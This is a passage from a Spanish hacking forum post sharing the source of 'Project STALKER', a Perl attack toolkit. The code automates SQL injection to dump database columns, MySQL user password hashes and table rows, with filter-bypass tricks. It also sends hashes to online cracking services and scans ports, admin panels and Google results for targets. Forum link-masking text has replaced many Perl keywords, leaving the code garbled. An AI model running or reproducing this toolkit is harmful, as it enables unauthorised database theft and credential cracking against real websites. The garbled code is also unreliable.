  608. $page3=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  609. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  610. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  611. You are not allowed to view links. Register or Login "\n[Columns length : $1 ]\n\n";
  612. savefile($save.".txt","[Columns length : $1 ]\n");
  613. my $si = $1;
  614. You are not allowed to view links. Register or Login $si;
  615. $page4=~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  616. $real = "1";
  617. for my $limit2(0..$si) {
  618. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  619. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  620. You are not allowed to view links. Register or Login "[Column $real] : $1\n";
  621. savefile($save.".txt","[Column $real] : $1");
  622. $real++;
  623. }
  624. }
  625. } else {
  626. You are not allowed to view links. Register or Login "\n[-] information_schema = ERROR\n";
  627. }
  628. You are not allowed to view links. Register or Login "\n";
  629. }
  630.  
  631. sub mysqluser {
  632. my ($page,$bypass,$save) = @_;
  633. my $cop = $page;
  634. my $cop1 = $page;
  635. savefile($save.".txt","\n");
  636. You are not allowed to view links. Register or Login "\n\n[+] Finding mysql.users\n";
  637. ($pass1,$pass2) = &bypass($bypass);
  638. $page =~You are not allowed to view links. Register or Login/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  639. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  640. if ($code=~/RATSXPDOWN/ig){
  641. $cop1 =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  642. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  643. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  644. You are not allowed to view links. Register or Login "\n[+] Users Found : $1\n\n";
  645. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  646. for my $limit(0..$1) {
  647. $cop =~You are not allowed to view links. Register or Login/hackman/unhex(You are not allowed to view links. Register or Login(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  648. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  649. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  650. You are not allowed to view links. Register or Login "[Host] : $1 [User] : $2 [Password] : $3\n";
  651. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  652. } else {
  653. You are not allowed to view links. Register or Login "\n";
  654. &reload;
  655. }
  656. }
  657. }
  658. } else {
  659. You are not allowed to view links. Register or Login "\n[-] mysql.user = ERROR\n\n";
  660. }
  661. }
  662.  
  663. sub You are not allowed to view links. Register or Login {
  664. savefile($_[5].".txt","\n");
  665. my $page = $_[0];
  666. ($pass1,$pass2) = &bypass($_[4]);
  667. if ($page=~/(.*)hackman(.*)/){
  668. my $start = $1;
  669. my $end = $2;
  670. You are not allowed to view links. Register or Login "\n\n[+] Extracting values...\n\n";
  671. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  672. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  673. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  674. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  675. $tota = $1;
  676. You are not allowed to view links. Register or Login "[+] Table : $_[3]\n";
  677. You are not allowed to view links. Register or Login "[+] Length of the rows : $tota\n\n";
  678. You are not allowed to view links. Register or Login "[$_[1]] [$_[2]]\n\n";
  679. savefile($_[5].".txt","[Table] : $_[3]");
  680. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  681. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  682. for my $limit(0..$tota) {
  683. You are not allowed to view links. Register or Login $limit;
  684. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  685. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  686. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  687. You are not allowed to view links. Register or Login "[$_[1]] : $1   [$_[2]] : $2\n";
  688. } else {
  689. You are not allowed to view links. Register or Login "\n\n[+] Extracting Finish\n\n";
  690. &reload;
  691. }
  692. }
  693. } else {
  694. You are not allowed to view links. Register or Login "[-] Not Found any DATA\n\n";
  695. }}}
  696.  
  697. sub bypass {
  698. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  699. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  700. else {You are not allowed to view links. Register or Login ("+","--");}}
  701.  
  702. sub ascii {
  703. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  704. }
  705.  
  706. sub base {
  707. $re = encode_base64($_[0]);
  708. You are not allowed to view links. Register or Login $re;
  709. You are not allowed to view links. Register or Login $re;
  710. }
  711.  
  712. sub base_de {
  713. $re = decode_base64($_[0]);
  714. You are not allowed to view links. Register or Login $re;
  715. You are not allowed to view links. Register or Login $re;
  716. }
  717.  
  718.  
  719. sub download {
  720. if ($nave->mirror($_[0],$_[1])) {
  721. if (-f $_[1]) {
  722. You are not allowed to view links. Register or Login true;
  723. }}}
  724.  
  725.  
  726. sub hex_en {
  727. my $string = $_[0];
  728. $hex = '0x';
  729. for (You are not allowed to view links. Register or Login //,$string) {
  730. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  731. }
  732. You are not allowed to view links. Register or Login $hex;
  733. }
  734.  
  735. sub hex_de {
  736. my $text = You are not allowed to view links. Register or Login;
  737. $text =~ s/^0x//;
  738. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $text =~ /../g;
  739. You are not allowed to view links. Register or Login $encode;
  740. }
  741.  
  742. sub ascii_de {
  743. my $text = You are not allowed to view links. Register or Login;
  744. $text = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$text;
  745. You are not allowed to view links. Register or Login $text;
  746. }
  747.  
  748. sub getprocess {
  749.  
  750. my %procesos;
  751.  
  752. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  753. my $dos = $uno->ConnectServer("","root\\cimv2");
  754.  
  755. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
  756. $procesos{$pro->{Caption}} = $pro->{ProcessId};
  757. }
  758. You are not allowed to view links. Register or Login %procesos;
  759. }
  760.  
  761. sub killprocess {
  762.  
  763. my ($numb,$pid) = @_;
  764.  
  765. if (Win32::Process::KillProcess($pid,$numb)) {
  766. You are not allowed to view links. Register or Login true;
  767. } else {
  768. You are not allowed to view links. Register or Login false;
  769. }
  770. }
  771.  
  772. sub getip {
  773. my $get = You are not allowed to view links. Register or Login($_[0]);
  774. You are not allowed to view links. Register or Login inet_ntoa($get);
  775. }
  776.  
  777. sub crackit {
  778.  
  779. my $secret = $_[0];
  780.  
  781. You are not allowed to view links. Register or Login "[+] Cracking $_[0]\n\n";
  782.  
  783. my %hash = (
  784.    
  785. 'http://passcracking.com/' => {
  786. 'tipo'  => 'post',
  787. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
  788. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  789. },  
  790. 'http://md5.hashcracking.com/search.php?md5=' =>  {
  791. 'tipo' => 'get',
  792. 'regex' => 'Cleartext of $_[0] is (.*)',
  793. },
  794. 'http://www.bigtrapeze.com/md5/' =>  {
  795. 'tipo' => 'post',
  796. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
  797. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  798. },
  799. 'http://opencrack.hashkiller.com/' =>  {
  800. 'tipo' => 'post',
  801. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  802. 'regex' => You are not allowed to view links. Register or Login(<\/div><div class="result">$_[0]:(.+)<br\/>),
  803. },
  804. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
  805. 'tipo' => 'post',
  806. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
  807. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  808. },
  809. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
  810. 'tipo' => 'get',
  811. 'regex' => You are not allowed to view links. Register or Login(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  812. }
  813. );
  814.  
  815. for my $data(keys %hash) {
  816.  
  817. if ($hash{$data}{tipo} eq "get") {
  818. $code = toma($data.$_[0]);
  819. if ($code=~/$hash{$data}{regex}/ig) {
  820. print "\n[+] Decoded : ".$1."\n\n";
  821. saveyes("logs/pass-found.txt",$secret.":".$1);
  822. }
  823. } else {
  824. $code = tomar($data,$hash{$data}{variables});
  825. if ($code=~/$hash{$data}{regex}/ig) {
  826. saveyes("logs/pass-found.txt",$secret.":".$1);
  827. }
  828. }
  829. }
  830. print "\n[+] Finish\n";
  831. }
  832.  
  833. sub ftp {
  834.  
  835. my ($ftp,$user,$pass) = @_;
  836.  
  837. if (my $socket = Net::FTP->new($ftp)) {
  838. if ($socket->login($user,$pass)) {
  839.  
  840. print "\n[+] Enter of the server FTP\n\n";
  841.  
  842. menu:
  843.  
  844. print "\n\nftp>";
  845. chomp (my $cmd = <stdin>);
  846. print "\n\n";
  847.  
  848. if ($cmd=~/help/) {
  849. print q(
  850.  
  851. help : show information
  852. cd : change directory <dir>
  853. dir : list a directory
  854. mdkdir : create a directory <dir>
  855. rmdir : delete a directory <dir>
  856. pwd : directory  
  857. del : delete a file <file>
  858. rename : change name of the a file <file1> <file2>
  859. size : size of the a file <file>
  860. put : upload a file <file>
  861. get : download a file <file>
  862. cdup : change dir <dir>
  863. exit : ??
  864.  
  865.  
  866. );
  867. }
  868.  
  869. if ($cmd=~/dir/ig) {
  870. if (my @files = $socket->dir()) {
  871. for(@files) {
  872. print "[+] ".$_."\n";
  873. }
  874. } else {
  875. print "\n\n[-] Error\n\n";
  876. }
  877. }
  878.  
  879. if ($cmd=~/pwd/ig) {
  880. print "[+] Path : ".$socket->pwd()."\n";
  881. }
  882.  
  883. if ($cmd=~/cd (.*)/ig) {
  884. if ($socket->cwd($1)) {
  885. print "[+] Directory changed\n";
  886. } else {
  887. print "\n\n[-] Error\n\n";
  888. }
  889. }
  890.  
  891. if ($cmd=~/cdup/ig) {
  892. if (my $dir = $socket->cdup()) {
  893. print "\n\n[+] Directory changed\n\n";
  894. } else {
  895. print "\n\n[-] Error\n\n";
  896. }
  897. }
  898.  
  899. if ($cmd=~/del (.*)/ig) {
  900. if ($socket->delete($1)) {
  901. print "[+] File deleted\n";
  902. } else {
  903. print "\n\n[-] Error\n\n";
  904. }
  905. }
  906.  
  907. if ($cmd=~/rename (.*) (.*)/ig) {
  908. if ($socket->rename($1,$2)) {
  909. print "[+] File Updated\n";
  910. } else {
  911. print "\n\n[-] Error\n\n";
  912. }
  913. }
  914.  
  915. if ($cmd=~/mkdir (.*)/ig) {
  916. if ($socket->mkdir($1)) {
  917. print "\n\n[+] Directory created\n";
  918. } else {
  919. print "\n\n[-] Error\n\n";
  920. }
  921. }
  922.  
  923. if ($cmd=~/rmdir (.*)/ig) {
  924. if ($socket->rmdir($1)) {
  925. print "\n\n[+] Directory deleted\n";
  926. } else {
  927. print "\n\n[-] Error\n\n";
  928. }
  929. }
  930.  
  931. if ($cmd=~/exit/ig) {
  932. next;
  933. }
  934.  
  935. if ($cmd=~/get (.*) (.*)/ig) {
  936. print "\n\n[+] Downloading file\n\n";
  937. if ($socket->get($1,$2)) {
  938. print "[+] Download completed";
  939. } else {
  940. print "\n\n[-] Error\n\n";
  941. }
  942. }
  943.  
  944. if ($cmd=~/put (.*) (.*)/ig) {
  945. print "\n\n[+] Uploading file\n\n";
  946. if ($socket->put($1,$2)) {
  947. print "[+] Upload completed";
  948. } else {
  949. print "\n\n[-] Error\n\n";
  950. }
  951. }
  952.  
  953. if ($cmd=~/quit/) {
  954. next;
  955. }
  956.  
  957. goto menu;
  958.  
  959. } else {
  960. print "\n[-] Failed the login\n\n";
  961. }
  962.  
  963. } else {
  964. print "\n\n[-] Error\n\n";
  965. }
  966.  
  967.  
  968.  
  969. }
  970.  
  971.  
  972. sub scanpaths {
  973.  
  974. my $urla = $_[0];
  975.  
  976. print "\n[+] Find paths in $urla\n\n\n";
  977. my @urls = repes(get_links(toma($urla)));
  978. for $url(@urls) {
  979. my $web = $url;
  980. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
  981. if ($_[0] =~/$auth/ or $auth eq "") {
  982. if ($path=~/(.*)\/(.*)\.(.*)$/) {
  983. my $borrar = $2.".".$3;
  984. if ($web=~/(.*)$borrar/) {
  985. my $co = $1;
  986. unless ($co=~/$auth/) {
  987. $co = $urla.$co;
  988. }
  989. $code = toma($co);
  990. if ($code=~/Index Of/ig) {
  991. print "[Link] : ".$co."\n";
  992. saveyes("logs/paths-found.txt",$co);
  993. }}}}}
  994. print "\n\n[+] Finish\n";
  995. }
  996.  
  997.  
  998. sub scanport {
  999.  
  1000. my %ports = ("21"=>"ftp",
  1001. "22"=>"ssh",
  1002. "25"=>"smtp",
  1003. "80"=>"http",
  1004. "110"=>"pop3",
  1005. "3306"=>"mysql"
  1006. );
  1007.  
  1008.  
  1009. print "[+] Scanning $_[0]\n\n\n";
  1010.  
  1011. for my $port(keys %ports) {
  1012.  
  1013. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
  1014. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
  1015. }
  1016. }
  1017. print "\n\n[+] Finish\n";
  1018. }
  1019.  
  1020.  
  1021. sub scanpanel {
  1022. print "[+] Scanning $_[0]\n\n\n";
  1023. for $path(@panels) {
  1024. $code = tomax($_[0]."/".$path);
  1025. if ($code->is_success) {
  1026. print "[Link] : ".$_[0]."/".$path."\n";
  1027. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
  1028. }
  1029. }
  1030. print "\n\n[+] Finish\n";
  1031. }
  1032.  
  1033. sub google {
  1034. my($a,$b) = @_;
  1035. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  1036. $code = toma("http://www.google.com.ar/search?hl=&You are not allowed to view links. Register or Login=".$a."&start=$pages");
  1037. my @links = get_links($code);
  1038. for my $l(@links) {
  1039. if ($l =~/webcache.googleusercontent.com/) {
  1040. push(@url,$l);
  1041. }
  1042. }
  1043. }
  1044.  
  1045. for(@url) {
  1046. if ($_ =~/cache:(.*?):(.*?)\+/) {
  1047. push(@founds,$2);
  1048. }
  1049. }
  1050.  
  1051. my @founds = repes(@founds);
  1052.  
  1053. return @founds;
  1054. }
  1055.  
  1056.  
  1057. sub sql {
  1058.  
  1059. my ($pass1,$pass2) = ("+","--");
  1060. my $page = shift;
  1061. $code1 = toma($page."-1".$pass1."union".$pass1."You are not allowed to view links. Register or Login".$pass1."666".$pass2);
  1062. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  1063. print "[+] SQLI : $page\a\n";
  1064. saveyes("logs/sql-logs.txt",$page);
  1065. }}
  1066.  
  1067. sub get_links {
  1068.  
  1069. my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  1070. return @links;
  1071.  
  1072. sub agarrar {
  1073. my ($a,%b) = @_;
  1074. push(@links,values %b);
  1075. }
  1076.  
  1077. }
  1078.  
  1079. sub repes {
  1080. foreach $test(@_) {
  1081. push @limpio,$test unless $repe{$test}++;
  1082. }
  1083. return @limpio;
  1084. }
  1085.  
  1086. sub head {
  1087. cprint "\x0311"; #13
  1088. print "\n\n-- == Project STALKER == --\n\n";
  1089. cprint "\x030";
  1090. }
  1091.  
  1092. sub copyright {
  1093. cprint "\x0311"; #13
  1094. print"\n\n(C) Doddy Hackman 2011\n\n";
  1095. cprint "\x030";
  1096. }
  1097.  
  1098. sub toma {
  1099. return $nave->get($_[0])->content;
  1100. }
  1101.  
  1102. sub tomax {
  1103. return $nave->get($_[0]);
  1104. }
  1105.  
  1106. sub tomar {
  1107. my ($web,$var) = @_;
  1108. return $nave->post($web,[%{$var}])->content;
  1109. }
  1110.  
  1111.  
  1112. sub conectar {
  1113.  
  1114. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
  1115. Proto => "tcp",Timeout  => 5);
  1116.  
  1117. print $sockex $_[2]."\r\n";
  1118. $sockex->read($re,5000);
  1119. $sockex->close;
  1120. return $re."\r\n";
  1121. }
  1122.  
  1123.  
  1124. sub enter {
  1125.  
  1126. my ($host,$user,$pass) = @_;
  1127.  
  1128. print "[+] Connecting to the server\n";
  1129.  
  1130. $info = "dbi:mysql::".$host.":3306";
  1131. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
  1132.  
  1133. print "\n[+] Enter in the database";
  1134.  
  1135. while(1) {
  1136. print "\n\n\n[+] Query : ";
  1137. chomp(my $ac = <stdin>);
  1138.  
  1139. if ($ac eq "You are not allowed to view links. Register or Login") {
  1140. $enter->disconnect;
  1141. print "\n\n[+] Closing connection\n\n";
  1142. last;
  1143. }
  1144.  
  1145. $re = $enter->prepare($ac);
  1146. $re->execute();
  1147. my $total = $re->rows();
  1148.  
  1149. my @columnas = @{$re->{NAME}};
  1150.  
  1151. if ($total eq "-1") {
  1152. print "\n\n[-] Query Error\n";
  1153. next;
  1154. } else {
  1155. print "\n\n[+] Result of the query\n";
  1156. if ($total eq 0) {
  1157. print "\n\n[+] Not rows returned\n\n";
  1158. } else {
  1159. print "\n\n[+] Rows returned : ".$total."\n\n\n";
  1160. for(@columnas) {
  1161. print $_."\t\t";
  1162. }
  1163. print "\n\n";
  1164. while (@row = $re->fetchrow_array) {
  1165. for(@row) {
  1166. print $_."\t\t";
  1167. }
  1168. print "\n";
  1169. }}}}
  1170. } else {
  1171. print "\n[-] Error connecting\n";
  1172. }}
  1173.  
  1174. sub saveyes {
  1175. open (SAVE,">>".$_[0]);
  1176. print SAVE $_[1]."\n";
  1177. close SAVE;
  1178. }
  1179.  
  1180. sub savefile {
  1181. open (SAVE,">>logs/webs/".$_[0]);
  1182. print SAVE $_[1]."\n";
  1183. close SAVE;
  1184. }
  1185.  
  1186. sub coleccionar {
  1187. opendir DIR,$_[0];
  1188. my @archivos = readdir DIR;
  1189. close DIR;
  1190. return @archivos;
  1191. }
  1192.  
  1193. sub helpme {
  1194.  
  1195. cprint "\x0310"; #13
  1196. print qq(
  1197.  
  1198. Commands :
  1199.  
  1200.  
  1201. getinfo
  1202. getip <host>
  1203. getlink <page>
  1204. getprocess
  1205. killprocess <name process> <pid process>
  1206. conec <host> <port> <command>  
  1207. allow <host>
  1208. paths <page>
  1209. encodehex <text>
  1210. decodehex <text>
  1211. encodeascii <text>
  1212. decodeascii <text>
  1213. encodebase <text>
  1214. decodebase <text>
  1215. scanport <host>
  1216. panel <page>
  1217. getpass <hash>
  1218. kobra <page>
  1219. ftp <host> <user> <pass>
  1220. mysql <host> <user> <pass>
  1221. navegator
  1222. scangoogle
  1223. help
  1224. exit
  1225.  
  1226. );
  1227. cprint "\x030";
  1228. }
  1229.  
  1230. #
  1231. #  The End ?
  1232. #
  1233.  

Eso es todo
« Última modificación: Marzo 14, 2015, 10:16:20 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 2854
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1325
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
[Uniscan] Scanner de vulnerabilidades WEB hecho en Perl

Iniciado por tar3kw0rm3d

Respuestas: 0
Vistas: 1473
Último mensaje Junio 02, 2013, 08:01:28 pm
por tar3kw0rm3d
[Perl] Counter Strike 1.6 Servers List

Iniciado por BigBear

Respuestas: 0
Vistas: 1013
Último mensaje Noviembre 12, 2012, 07:32:11 pm
por BigBear
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1266
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX